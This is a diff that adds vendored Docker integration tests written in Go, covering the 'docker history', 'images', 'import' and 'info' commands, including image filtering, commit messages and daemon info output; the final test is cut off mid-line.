+import ( + "fmt" + "regexp" + "strconv" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// This is a heisen-test. Because the created timestamp of images and the behavior of +// sort is not predictable it doesn't always fail. +func (s *DockerSuite) TestBuildHistory(c *check.C) { + name := "testbuildhistory" + _, err := buildImage(name, `FROM `+minimalBaseImage()+` +LABEL label.A="A" +LABEL label.B="B" +LABEL label.C="C" +LABEL label.D="D" +LABEL label.E="E" +LABEL label.F="F" +LABEL label.G="G" +LABEL label.H="H" +LABEL label.I="I" +LABEL label.J="J" +LABEL label.K="K" +LABEL label.L="L" +LABEL label.M="M" +LABEL label.N="N" +LABEL label.O="O" +LABEL label.P="P" +LABEL label.Q="Q" +LABEL label.R="R" +LABEL label.S="S" +LABEL label.T="T" +LABEL label.U="U" +LABEL label.V="V" +LABEL label.W="W" +LABEL label.X="X" +LABEL label.Y="Y" +LABEL label.Z="Z"`, + true) + + c.Assert(err, checker.IsNil) + + out, _ := dockerCmd(c, "history", "testbuildhistory") + actualValues := strings.Split(out, "\n")[1:27] + expectedValues := [26]string{"Z", "Y", "X", "W", "V", "U", "T", "S", "R", "Q", "P", "O", "N", "M", "L", "K", "J", "I", "H", "G", "F", "E", "D", "C", "B", "A"} + + for i := 0; i < 26; i++ { + echoValue := fmt.Sprintf("LABEL label.%s=%s", expectedValues[i], expectedValues[i]) + actualValue := actualValues[i] + c.Assert(actualValue, checker.Contains, echoValue) + } + +} + +func (s *DockerSuite) TestHistoryExistentImage(c *check.C) { + dockerCmd(c, "history", "busybox") +} + +func (s *DockerSuite) TestHistoryNonExistentImage(c *check.C) { + _, _, err := dockerCmdWithError("history", "testHistoryNonExistentImage") + c.Assert(err, checker.NotNil, check.Commentf("history on a non-existent image should fail.")) +} + +func (s *DockerSuite) TestHistoryImageWithComment(c *check.C) { + name := "testhistoryimagewithcomment" + + // make an image through docker commit [ -m messages ] + + dockerCmd(c, "run", "--name", name, "busybox", "true") + dockerCmd(c, "wait", name) + + comment := "This_is_a_comment" + dockerCmd(c, "commit", "-m="+comment, name, name) + + // test docker history to check comment messages + + out, _ := dockerCmd(c, "history", name) + outputTabs := strings.Fields(strings.Split(out, "\n")[1]) + actualValue := outputTabs[len(outputTabs)-1] + c.Assert(actualValue, checker.Contains, comment) +} + +func (s *DockerSuite) TestHistoryHumanOptionFalse(c *check.C) { + out, _ := dockerCmd(c, "history", "--human=false", "busybox") + lines := strings.Split(out, "\n") + sizeColumnRegex, _ := regexp.Compile("SIZE +") + indices := sizeColumnRegex.FindStringIndex(lines[0]) + startIndex := indices[0] + endIndex := indices[1] + for i := 1; i < len(lines)-1; i++ { + if endIndex > len(lines[i]) { + endIndex = len(lines[i]) + } + sizeString := lines[i][startIndex:endIndex] + + _, err := strconv.Atoi(strings.TrimSpace(sizeString)) + c.Assert(err, checker.IsNil, check.Commentf("The size '%s' was not an Integer", sizeString)) + } +} + +func (s *DockerSuite) TestHistoryHumanOptionTrue(c *check.C) { + out, _ := dockerCmd(c, "history", "--human=true", "busybox") + lines := strings.Split(out, "\n") + sizeColumnRegex, _ := regexp.Compile("SIZE +") + humanSizeRegexRaw := "\\d+.*B" // Matches human sizes like 10 MB, 3.2 KB, etc + indices := sizeColumnRegex.FindStringIndex(lines[0]) + startIndex := indices[0] + endIndex := indices[1] + for i := 1; i < len(lines)-1; i++ { + if endIndex > len(lines[i]) { + endIndex = len(lines[i]) + } + sizeString := lines[i][startIndex:endIndex] + c.Assert(strings.TrimSpace(sizeString), checker.Matches, humanSizeRegexRaw, check.Commentf("The size '%s' was not in human format", sizeString)) + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_images_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_images_test.go new file mode 100644 index 0000000000..3b678a2586 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_images_test.go @@ -0,0 +1,364 @@ +package main + +import ( + "fmt" + "io/ioutil" + "os" + "path/filepath" + "reflect" + "sort" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/stringid" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestImagesEnsureImageIsListed(c *check.C) { + imagesOut, _ := dockerCmd(c, "images") + c.Assert(imagesOut, checker.Contains, "busybox") +} + +func (s *DockerSuite) TestImagesEnsureImageWithTagIsListed(c *check.C) { + name := "imagewithtag" + dockerCmd(c, "tag", "busybox", name+":v1") + dockerCmd(c, "tag", "busybox", name+":v1v1") + dockerCmd(c, "tag", "busybox", name+":v2") + + imagesOut, _ := dockerCmd(c, "images", name+":v1") + c.Assert(imagesOut, checker.Contains, name) + c.Assert(imagesOut, checker.Contains, "v1") + c.Assert(imagesOut, checker.Not(checker.Contains), "v2") + c.Assert(imagesOut, checker.Not(checker.Contains), "v1v1") + + imagesOut, _ = dockerCmd(c, "images", name) + c.Assert(imagesOut, checker.Contains, name) + c.Assert(imagesOut, checker.Contains, "v1") + c.Assert(imagesOut, checker.Contains, "v1v1") + c.Assert(imagesOut, checker.Contains, "v2") +} + +func (s *DockerSuite) TestImagesEnsureImageWithBadTagIsNotListed(c *check.C) { + imagesOut, _ := dockerCmd(c, "images", "busybox:nonexistent") + c.Assert(imagesOut, checker.Not(checker.Contains), "busybox") +} + +func (s *DockerSuite) TestImagesOrderedByCreationDate(c *check.C) { + id1, err := buildImage("order:test_a", + `FROM busybox + MAINTAINER dockerio1`, true) + c.Assert(err, checker.IsNil) + time.Sleep(1 * time.Second) + id2, err := buildImage("order:test_c", + `FROM busybox + MAINTAINER dockerio2`, true) + c.Assert(err, checker.IsNil) + time.Sleep(1 * time.Second) + id3, err := buildImage("order:test_b", + `FROM busybox + MAINTAINER dockerio3`, true) + c.Assert(err, checker.IsNil) + + out, _ := dockerCmd(c, "images", "-q", "--no-trunc") + imgs := strings.Split(out, "\n") + c.Assert(imgs[0], checker.Equals, id3, check.Commentf("First image must be %s, got %s", id3, imgs[0])) + c.Assert(imgs[1], checker.Equals, id2, check.Commentf("First image must be %s, got %s", id2, imgs[1])) + c.Assert(imgs[2], checker.Equals, id1, check.Commentf("First image must be %s, got %s", id1, imgs[2])) +} + +func (s *DockerSuite) TestImagesErrorWithInvalidFilterNameTest(c *check.C) { + out, _, err := dockerCmdWithError("images", "-f", "FOO=123") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "Invalid filter") +} + +func (s *DockerSuite) TestImagesFilterLabelMatch(c *check.C) { + imageName1 := "images_filter_test1" + imageName2 := "images_filter_test2" + imageName3 := "images_filter_test3" + image1ID, err := buildImage(imageName1, + `FROM busybox + LABEL match me`, true) + c.Assert(err, check.IsNil) + + image2ID, err := buildImage(imageName2, + `FROM busybox + LABEL match="me too"`, true) + c.Assert(err, check.IsNil) + + image3ID, err := buildImage(imageName3, + `FROM busybox + LABEL nomatch me`, true) + c.Assert(err, check.IsNil) + + out, _ := dockerCmd(c, "images", "--no-trunc", "-q", "-f", "label=match") + out = strings.TrimSpace(out) + c.Assert(out, check.Matches, fmt.Sprintf("[\\s\\w:]*%s[\\s\\w:]*", image1ID)) + c.Assert(out, check.Matches, fmt.Sprintf("[\\s\\w:]*%s[\\s\\w:]*", image2ID)) + c.Assert(out, check.Not(check.Matches), fmt.Sprintf("[\\s\\w:]*%s[\\s\\w:]*", image3ID)) + + out, _ = dockerCmd(c, "images", "--no-trunc", "-q", "-f", "label=match=me too") + out = strings.TrimSpace(out) + c.Assert(out, check.Equals, image2ID) +} + +// Regression : #15659 +func (s *DockerSuite) TestImagesFilterLabelWithCommit(c *check.C) { + // Create a container + dockerCmd(c, "run", "--name", "bar", "busybox", "/bin/sh") + // Commit with labels "using changes" + out, _ := dockerCmd(c, "commit", "-c", "LABEL foo.version=1.0.0-1", "-c", "LABEL foo.name=bar", "-c", "LABEL foo.author=starlord", "bar", "bar:1.0.0-1") + imageID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "images", "--no-trunc", "-q", "-f", "label=foo.version=1.0.0-1") + out = strings.TrimSpace(out) + c.Assert(out, check.Equals, imageID) +} + +func (s *DockerSuite) TestImagesFilterSinceAndBefore(c *check.C) { + imageID1, err := buildImage("image:1", `FROM `+minimalBaseImage()+` +LABEL number=1`, true) + c.Assert(err, checker.IsNil) + imageID2, err := buildImage("image:2", `FROM `+minimalBaseImage()+` +LABEL number=2`, true) + c.Assert(err, checker.IsNil) + imageID3, err := buildImage("image:3", `FROM `+minimalBaseImage()+` +LABEL number=3`, true) + c.Assert(err, checker.IsNil) + + expected := []string{imageID3, imageID2} + + out, _ := dockerCmd(c, "images", "-f", "since=image:1", "image") + c.Assert(assertImageList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Image list is not in the correct order: %v\n%s", expected, out)) + + out, _ = dockerCmd(c, "images", "-f", "since="+imageID1, "image") + c.Assert(assertImageList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Image list is not in the correct order: %v\n%s", expected, out)) + + expected = []string{imageID3} + + out, _ = dockerCmd(c, "images", "-f", "since=image:2", "image") + c.Assert(assertImageList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Image list is not in the correct order: %v\n%s", expected, out)) + + out, _ = dockerCmd(c, "images", "-f", "since="+imageID2, "image") + c.Assert(assertImageList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Image list is not in the correct order: %v\n%s", expected, out)) + + expected = []string{imageID2, imageID1} + + out, _ = dockerCmd(c, "images", "-f", "before=image:3", "image") + c.Assert(assertImageList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter: Image list is not in the correct order: %v\n%s", expected, out)) + + out, _ = dockerCmd(c, "images", "-f", "before="+imageID3, "image") + c.Assert(assertImageList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter: Image list is not in the correct order: %v\n%s", expected, out)) + + expected = []string{imageID1} + + out, _ = dockerCmd(c, "images", "-f", "before=image:2", "image") + c.Assert(assertImageList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter: Image list is not in the correct order: %v\n%s", expected, out)) + + out, _ = dockerCmd(c, "images", "-f", "before="+imageID2, "image") + c.Assert(assertImageList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter: Image list is not in the correct order: %v\n%s", expected, out)) +} + +func assertImageList(out string, expected []string) bool { + lines := strings.Split(strings.Trim(out, "\n "), "\n") + + if len(lines)-1 != len(expected) { + return false + } + + imageIDIndex := strings.Index(lines[0], "IMAGE ID") + for i := 0; i < len(expected); i++ { + imageID := lines[i+1][imageIDIndex : imageIDIndex+12] + found := false + for _, e := range expected { + if imageID == e[7:19] { + found = true + break + } + } + if !found { + return false + } + } + + return true +} + +func (s *DockerSuite) TestImagesFilterSpaceTrimCase(c *check.C) { + imageName := "images_filter_test" + buildImage(imageName, + `FROM busybox + RUN touch /test/foo + RUN touch /test/bar + RUN touch /test/baz`, true) + + filters := []string{ + "dangling=true", + "Dangling=true", + " dangling=true", + "dangling=true ", + "dangling = true", + } + + imageListings := make([][]string, 5, 5) + for idx, filter := range filters { + out, _ := dockerCmd(c, "images", "-q", "-f", filter) + listing := strings.Split(out, "\n") + sort.Strings(listing) + imageListings[idx] = listing + } + + for idx, listing := range imageListings { + if idx < 4 && !reflect.DeepEqual(listing, imageListings[idx+1]) { + for idx, errListing := range imageListings { + fmt.Printf("out %d\n", idx) + for _, image := range errListing { + fmt.Print(image) + } + fmt.Print("") + } + c.Fatalf("All output must be the same") + } + } +} + +func (s *DockerSuite) TestImagesEnsureDanglingImageOnlyListedOnce(c *check.C) { + testRequires(c, DaemonIsLinux) + // create container 1 + out, _ := dockerCmd(c, "run", "-d", "busybox", "true") + containerID1 := strings.TrimSpace(out) + + // tag as foobox + out, _ = dockerCmd(c, "commit", containerID1, "foobox") + imageID := stringid.TruncateID(strings.TrimSpace(out)) + + // overwrite the tag, making the previous image dangling + dockerCmd(c, "tag", "busybox", "foobox") + + out, _ = dockerCmd(c, "images", "-q", "-f", "dangling=true") + // Expect one dangling image + c.Assert(strings.Count(out, imageID), checker.Equals, 1) + + out, _ = dockerCmd(c, "images", "-q", "-f", "dangling=false") + //dangling=false would not include dangling images + c.Assert(out, checker.Not(checker.Contains), imageID) + + out, _ = dockerCmd(c, "images") + //docker images still include dangling images + c.Assert(out, checker.Contains, imageID) + +} + +func (s *DockerSuite) TestImagesWithIncorrectFilter(c *check.C) { + out, _, err := dockerCmdWithError("images", "-f", "dangling=invalid") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, "Invalid filter") +} + +func (s *DockerSuite) TestImagesEnsureOnlyHeadsImagesShown(c *check.C) { + dockerfile := ` + FROM busybox + MAINTAINER docker + ENV foo bar` + + head, out, err := buildImageWithOut("scratch-image", dockerfile, false) + c.Assert(err, check.IsNil) + + // this is just the output of docker build + // we're interested in getting the image id of the MAINTAINER instruction + // and that's located at output, line 5, from 7 to end + split := strings.Split(out, "\n") + intermediate := strings.TrimSpace(split[5][7:]) + + out, _ = dockerCmd(c, "images") + // images shouldn't show non-heads images + c.Assert(out, checker.Not(checker.Contains), intermediate) + // images should contain final built images + c.Assert(out, checker.Contains, stringid.TruncateID(head)) +} + +func (s *DockerSuite) TestImagesEnsureImagesFromScratchShown(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support FROM scratch + + dockerfile := ` + FROM scratch + MAINTAINER docker` + + id, _, err := buildImageWithOut("scratch-image", dockerfile, false) + c.Assert(err, check.IsNil) + + out, _ := dockerCmd(c, "images") + // images should contain images built from scratch + c.Assert(out, checker.Contains, stringid.TruncateID(id)) +} + +// For W2W - equivalent to TestImagesEnsureImagesFromScratchShown but Windows +// doesn't support from scratch +func (s *DockerSuite) TestImagesEnsureImagesFromBusyboxShown(c *check.C) { + dockerfile := ` + FROM busybox + MAINTAINER docker` + + id, _, err := buildImageWithOut("busybox-image", dockerfile, false) + c.Assert(err, check.IsNil) + + out, _ := dockerCmd(c, "images") + // images should contain images built from busybox + c.Assert(out, checker.Contains, stringid.TruncateID(id)) +} + +// #18181 +func (s *DockerSuite) TestImagesFilterNameWithPort(c *check.C) { + tag := "a.b.c.d:5000/hello" + dockerCmd(c, "tag", "busybox", tag) + out, _ := dockerCmd(c, "images", tag) + c.Assert(out, checker.Contains, tag) + + out, _ = dockerCmd(c, "images", tag+":latest") + c.Assert(out, checker.Contains, tag) + + out, _ = dockerCmd(c, "images", tag+":no-such-tag") + c.Assert(out, checker.Not(checker.Contains), tag) +} + +func (s *DockerSuite) TestImagesFormat(c *check.C) { + // testRequires(c, DaemonIsLinux) + tag := "myimage" + dockerCmd(c, "tag", "busybox", tag+":v1") + dockerCmd(c, "tag", "busybox", tag+":v2") + + out, _ := dockerCmd(c, "images", "--format", "{{.Repository}}", tag) + lines := strings.Split(strings.TrimSpace(string(out)), "\n") + + expected := []string{"myimage", "myimage"} + var names []string + names = append(names, lines...) + c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names)) +} + +// ImagesDefaultFormatAndQuiet +func (s *DockerSuite) TestImagesFormatDefaultFormat(c *check.C) { + testRequires(c, DaemonIsLinux) + + // create container 1 + out, _ := dockerCmd(c, "run", "-d", "busybox", "true") + containerID1 := strings.TrimSpace(out) + + // tag as foobox + out, _ = dockerCmd(c, "commit", containerID1, "myimage") + imageID := stringid.TruncateID(strings.TrimSpace(out)) + + config := `{ + "imagesFormat": "{{ .ID }} default" +}` + d, err := ioutil.TempDir("", "integration-cli-") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(d) + + err = ioutil.WriteFile(filepath.Join(d, "config.json"), []byte(config), 0644) + c.Assert(err, checker.IsNil) + + out, _ = dockerCmd(c, "--config", d, "images", "-q", "myimage") + c.Assert(out, checker.Equals, imageID+"\n", check.Commentf("Expected to print only the image id, got %v\n", out)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_import_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_import_test.go new file mode 100644 index 0000000000..57dc2a6698 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_import_test.go @@ -0,0 +1,150 @@ +package main + +import ( + "bufio" + "compress/gzip" + "io/ioutil" + "os" + "os/exec" + "regexp" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestImportDisplay(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "true") + cleanedContainerID := strings.TrimSpace(out) + + out, _, err := runCommandPipelineWithOutput( + exec.Command(dockerBinary, "export", cleanedContainerID), + exec.Command(dockerBinary, "import", "-"), + ) + c.Assert(err, checker.IsNil) + + c.Assert(out, checker.Count, "\n", 1, check.Commentf("display is expected 1 '\\n' but didn't")) + + image := strings.TrimSpace(out) + out, _ = dockerCmd(c, "run", "--rm", image, "true") + c.Assert(out, checker.Equals, "", check.Commentf("command output should've been nothing.")) +} + +func (s *DockerSuite) TestImportBadURL(c *check.C) { + out, _, err := dockerCmdWithError("import", "http://nourl/bad") + c.Assert(err, checker.NotNil, check.Commentf("import was supposed to fail but didn't")) + // Depending on your system you can get either of these errors + if !strings.Contains(out, "dial tcp") && + !strings.Contains(out, "ApplyLayer exit status 1 stdout: stderr: archive/tar: invalid tar header") && + !strings.Contains(out, "Error processing tar file") { + c.Fatalf("expected an error msg but didn't get one.\nErr: %v\nOut: %v", err, out) + } +} + +func (s *DockerSuite) TestImportFile(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "--name", "test-import", "busybox", "true") + + temporaryFile, err := ioutil.TempFile("", "exportImportTest") + c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file")) + defer os.Remove(temporaryFile.Name()) + + runCmd := exec.Command(dockerBinary, "export", "test-import") + runCmd.Stdout = bufio.NewWriter(temporaryFile) + + _, err = runCommand(runCmd) + c.Assert(err, checker.IsNil, check.Commentf("failed to export a container")) + + out, _ := dockerCmd(c, "import", temporaryFile.Name()) + c.Assert(out, checker.Count, "\n", 1, check.Commentf("display is expected 1 '\\n' but didn't")) + image := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "run", "--rm", image, "true") + c.Assert(out, checker.Equals, "", check.Commentf("command output should've been nothing.")) +} + +func (s *DockerSuite) TestImportGzipped(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "--name", "test-import", "busybox", "true") + + temporaryFile, err := ioutil.TempFile("", "exportImportTest") + c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file")) + defer os.Remove(temporaryFile.Name()) + + runCmd := exec.Command(dockerBinary, "export", "test-import") + w := gzip.NewWriter(temporaryFile) + runCmd.Stdout = w + + _, err = runCommand(runCmd) + c.Assert(err, checker.IsNil, check.Commentf("failed to export a container")) + err = w.Close() + c.Assert(err, checker.IsNil, check.Commentf("failed to close gzip writer")) + temporaryFile.Close() + out, _ := dockerCmd(c, "import", temporaryFile.Name()) + c.Assert(out, checker.Count, "\n", 1, check.Commentf("display is expected 1 '\\n' but didn't")) + image := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "run", "--rm", image, "true") + c.Assert(out, checker.Equals, "", check.Commentf("command output should've been nothing.")) +} + +func (s *DockerSuite) TestImportFileWithMessage(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "--name", "test-import", "busybox", "true") + + temporaryFile, err := ioutil.TempFile("", "exportImportTest") + c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file")) + defer os.Remove(temporaryFile.Name()) + + runCmd := exec.Command(dockerBinary, "export", "test-import") + runCmd.Stdout = bufio.NewWriter(temporaryFile) + + _, err = runCommand(runCmd) + c.Assert(err, checker.IsNil, check.Commentf("failed to export a container")) + + message := "Testing commit message" + out, _ := dockerCmd(c, "import", "-m", message, temporaryFile.Name()) + c.Assert(out, checker.Count, "\n", 1, check.Commentf("display is expected 1 '\\n' but didn't")) + image := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "history", image) + split := strings.Split(out, "\n") + + c.Assert(split, checker.HasLen, 3, check.Commentf("expected 3 lines from image history")) + r := regexp.MustCompile("[\\s]{2,}") + split = r.Split(split[1], -1) + + c.Assert(message, checker.Equals, split[3], check.Commentf("didn't get expected value in commit message")) + + out, _ = dockerCmd(c, "run", "--rm", image, "true") + c.Assert(out, checker.Equals, "", check.Commentf("command output should've been nothing")) +} + +func (s *DockerSuite) TestImportFileNonExistentFile(c *check.C) { + _, _, err := dockerCmdWithError("import", "example.com/myImage.tar") + c.Assert(err, checker.NotNil, check.Commentf("import non-existing file must failed")) +} + +func (s *DockerSuite) TestImportWithQuotedChanges(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "--name", "test-import", "busybox", "true") + + temporaryFile, err := ioutil.TempFile("", "exportImportTest") + c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file")) + defer os.Remove(temporaryFile.Name()) + + result := icmd.RunCmd(icmd.Cmd{ + Command: binaryWithArgs("export", "test-import"), + Stdout: bufio.NewWriter(temporaryFile), + }) + c.Assert(result, icmd.Matches, icmd.Success) + + result = dockerCmdWithResult("import", "-c", `ENTRYPOINT ["/bin/sh", "-c"]`, temporaryFile.Name()) + c.Assert(result, icmd.Matches, icmd.Success) + image := strings.TrimSpace(result.Stdout()) + + result = dockerCmdWithResult("run", "--rm", image, "true") + c.Assert(result, icmd.Matches, icmd.Expected{Out: icmd.None}) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_info_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_info_test.go new file mode 100644 index 0000000000..62ce7e22f2 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_info_test.go @@ -0,0 +1,234 @@ +package main + +import ( + "encoding/json" + "fmt" + "net" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// ensure docker info succeeds +func (s *DockerSuite) TestInfoEnsureSucceeds(c *check.C) { + out, _ := dockerCmd(c, "info") + + // always shown fields + stringsToCheck := []string{ + "ID:", + "Containers:", + " Running:", + " Paused:", + " Stopped:", + "Images:", + "OSType:", + "Architecture:", + "Logging Driver:", + "Operating System:", + "CPUs:", + "Total Memory:", + "Kernel Version:", + "Storage Driver:", + "Volume:", + "Network:", + "Live Restore Enabled:", + } + + if daemonPlatform == "linux" { + stringsToCheck = append(stringsToCheck, "Init Binary:", "Security Options:", "containerd version:", "runc version:", "init version:") + } + + if DaemonIsLinux.Condition() { + stringsToCheck = append(stringsToCheck, "Runtimes:", "Default Runtime: runc") + } + + if experimentalDaemon { + stringsToCheck = append(stringsToCheck, "Experimental: true") + } else { + stringsToCheck = append(stringsToCheck, "Experimental: false") + } + + for _, linePrefix := range stringsToCheck { + c.Assert(out, checker.Contains, linePrefix, check.Commentf("couldn't find string %v in output", linePrefix)) + } +} + +// TestInfoFormat tests `docker info --format` +func (s *DockerSuite) TestInfoFormat(c *check.C) { + out, status := dockerCmd(c, "info", "--format", "{{json .}}") + c.Assert(status, checker.Equals, 0) + var m map[string]interface{} + err := json.Unmarshal([]byte(out), &m) + c.Assert(err, checker.IsNil) + _, _, err = dockerCmdWithError("info", "--format", "{{.badString}}") + c.Assert(err, checker.NotNil) +} + +// TestInfoDiscoveryBackend verifies that a daemon run with `--cluster-advertise` and +// `--cluster-store` properly show the backend's endpoint in info output. +func (s *DockerSuite) TestInfoDiscoveryBackend(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + d := NewDaemon(c) + discoveryBackend := "consul://consuladdr:consulport/some/path" + discoveryAdvertise := "1.1.1.1:2375" + err := d.Start(fmt.Sprintf("--cluster-store=%s", discoveryBackend), fmt.Sprintf("--cluster-advertise=%s", discoveryAdvertise)) + c.Assert(err, checker.IsNil) + defer d.Stop() + + out, err := d.Cmd("info") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, fmt.Sprintf("Cluster Store: %s\n", discoveryBackend)) + c.Assert(out, checker.Contains, fmt.Sprintf("Cluster Advertise: %s\n", discoveryAdvertise)) +} + +// TestInfoDiscoveryInvalidAdvertise verifies that a daemon run with +// an invalid `--cluster-advertise` configuration +func (s *DockerSuite) TestInfoDiscoveryInvalidAdvertise(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + d := NewDaemon(c) + discoveryBackend := "consul://consuladdr:consulport/some/path" + + // --cluster-advertise with an invalid string is an error + err := d.Start(fmt.Sprintf("--cluster-store=%s", discoveryBackend), "--cluster-advertise=invalid") + c.Assert(err, checker.Not(checker.IsNil)) + + // --cluster-advertise without --cluster-store is also an error + err = d.Start("--cluster-advertise=1.1.1.1:2375") + c.Assert(err, checker.Not(checker.IsNil)) +} + +// TestInfoDiscoveryAdvertiseInterfaceName verifies that a daemon run with `--cluster-advertise` +// configured with interface name properly show the advertise ip-address in info output. +func (s *DockerSuite) TestInfoDiscoveryAdvertiseInterfaceName(c *check.C) { + testRequires(c, SameHostDaemon, Network, DaemonIsLinux) + + d := NewDaemon(c) + discoveryBackend := "consul://consuladdr:consulport/some/path" + discoveryAdvertise := "eth0" + + err := d.Start(fmt.Sprintf("--cluster-store=%s", discoveryBackend), fmt.Sprintf("--cluster-advertise=%s:2375", discoveryAdvertise)) + c.Assert(err, checker.IsNil) + defer d.Stop() + + iface, err := net.InterfaceByName(discoveryAdvertise) + c.Assert(err, checker.IsNil) + addrs, err := iface.Addrs() + c.Assert(err, checker.IsNil) + c.Assert(len(addrs), checker.GreaterThan, 0) + ip, _, err := net.ParseCIDR(addrs[0].String()) + c.Assert(err, checker.IsNil) + + out, err := d.Cmd("info") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, fmt.Sprintf("Cluster Store: %s\n", discoveryBackend)) + c.Assert(out, checker.Contains, fmt.Sprintf("Cluster Advertise: %s:2375\n", ip.String())) +} + +func (s *DockerSuite) TestInfoDisplaysRunningContainers(c *check.C) { + testRequires(c, DaemonIsLinux) + + dockerCmd(c, "run", "-d", "busybox", "top") + out, _ := dockerCmd(c, "info") + c.Assert(out, checker.Contains, fmt.Sprintf("Containers: %d\n", 1)) + c.Assert(out, checker.Contains, fmt.Sprintf(" Running: %d\n", 1)) + c.Assert(out, checker.Contains, fmt.Sprintf(" Paused: %d\n", 0)) + c.Assert(out, checker.Contains, fmt.Sprintf(" Stopped: %d\n", 0)) +} + +func (s *DockerSuite) TestInfoDisplaysPausedContainers(c *check.C) { + testRequires(c, IsPausable) + + out, _ := runSleepingContainer(c, "-d") + cleanedContainerID := strings.TrimSpace(out) + + dockerCmd(c, "pause", cleanedContainerID) + + out, _ = dockerCmd(c, "info") + c.Assert(out, checker.Contains, fmt.Sprintf("Containers: %d\n", 1)) + c.Assert(out, checker.Contains, fmt.Sprintf(" Running: %d\n", 0)) + c.Assert(out, checker.Contains, fmt.Sprintf(" Paused: %d\n", 1)) + c.Assert(out, checker.Contains, fmt.Sprintf(" Stopped: %d\n", 0)) +} + +func (s *DockerSuite) TestInfoDisplaysStoppedContainers(c *check.C) { + testRequires(c, DaemonIsLinux) + + out, _ := dockerCmd(c, "run", "-d", "busybox", "top") + cleanedContainerID := strings.TrimSpace(out) + + dockerCmd(c, "stop", cleanedContainerID) + + out, _ = dockerCmd(c, "info") + c.Assert(out, checker.Contains, fmt.Sprintf("Containers: %d\n", 1)) + c.Assert(out, checker.Contains, fmt.Sprintf(" Running: %d\n", 0)) + c.Assert(out, checker.Contains, fmt.Sprintf(" Paused: %d\n", 0)) + c.Assert(out, checker.Contains, fmt.Sprintf(" Stopped: %d\n", 1)) +} + +func (s *DockerSuite) TestInfoDebug(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + d := NewDaemon(c) + err := d.Start("--debug") + c.Assert(err, checker.IsNil) + defer d.Stop() + + out, err := d.Cmd("--debug", "info") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "Debug Mode (client): true\n") + c.Assert(out, checker.Contains, "Debug Mode (server): true\n") + c.Assert(out, checker.Contains, "File Descriptors") + c.Assert(out, checker.Contains, "Goroutines") + c.Assert(out, checker.Contains, "System Time") + c.Assert(out, checker.Contains, "EventsListeners") + c.Assert(out, checker.Contains, "Docker Root Dir") +} + +func (s *DockerSuite) TestInsecureRegistries(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + registryCIDR := "192.168.1.0/24" + registryHost := "insecurehost.com:5000" + + d := NewDaemon(c) + err := d.Start("--insecure-registry="+registryCIDR, "--insecure-registry="+registryHost) + c.Assert(err, checker.IsNil) + defer d.Stop() + + out, err := d.Cmd("info") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "Insecure Registries:\n") + c.Assert(out, checker.Contains, fmt.Sprintf(" %s\n", registryHost)) + c.Assert(out, checker.Contains, fmt.Sprintf(" %s\n", registryCIDR)) +} + +func (s *DockerDaemonSuite) TestRegistryMirrors(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + registryMirror1 := "https://192.168.1.2" + registryMirror2 := "http://registry.mirror.com:5000" + + err := s.d.Start("--registry-mirror="+registryMirror1, "--registry-mirror="+registryMirror2) + c.Assert(err, checker.IsNil) + + out, err := s.d.Cmd("info") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "Registry Mirrors:\n") + c.Assert(out, checker.Contains, fmt.Sprintf(" %s", registryMirror1)) + c.Assert(out, checker.Contains, fmt.Sprintf(" %s", registryMirror2)) +} + +// Test case for #24392 +func (s *DockerDaemonSuite) TestInfoLabels(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + err := s.d.Start("--label", `test.empty=`, "--label", `test.empty=`, "--label", 